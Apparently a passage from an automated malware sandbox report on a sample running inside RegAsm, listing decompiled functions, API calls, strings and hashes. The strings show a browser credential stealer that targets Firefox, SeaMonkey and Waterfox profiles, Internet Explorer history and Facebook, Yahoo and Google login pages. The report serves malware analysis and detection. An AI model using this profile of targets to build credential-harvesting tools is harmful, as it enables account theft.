                                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 646 40e283-40e286 640->646 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 646->648 649 40e288-40e290 free 646->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                                                                                  • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                  • String ID: r!A
                                                                                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                                                                                  • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                  • String ID: BIN
                                                                                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                  Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateErrorFileLastfree
                                                                                                                                                                                                  • String ID: |A
                                                                                                                                                                                                  • API String ID: 981974120-1717621600
                                                                                                                                                                                                  • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
